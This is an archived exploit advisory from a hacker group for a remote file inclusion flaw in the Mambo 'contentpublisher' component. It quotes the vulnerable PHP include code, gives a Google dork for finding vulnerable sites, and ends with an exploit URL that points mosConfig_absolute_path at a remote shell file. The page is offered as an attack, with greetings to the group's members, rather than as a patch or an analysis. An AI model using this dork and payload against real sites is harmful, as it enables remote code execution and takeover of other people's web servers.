Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13965
HistoryAug 21, 2006 - 12:00 a.m.

contentpublisher Mambo Component Remote File Include Vulnerabilities

2006-08-2100:00:00
vulners.com
47

!!!WWW.SiBERSAVASCiLAR.COM!!!

Title : contentpublisher Mambo Component Remote File Include Vulnerabilities


#Author: Crackers_Child

#cont@ct: [email protected]


Google Dorks : inurl:"/com_contentpublisher/"


Application : contentpublisher/ Component of Mambo


Bug İn contentpublisher.php

global $my, $mosConfig_live_site, $mosConfig_lang;

if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php')) {
include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php');
} else {
include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/english.php');
}


Exploit:

http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.php?mosConfig_absolute_path=Shell.txt?


greets:

All My Friends And SiberSavascilar.Com Members !


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------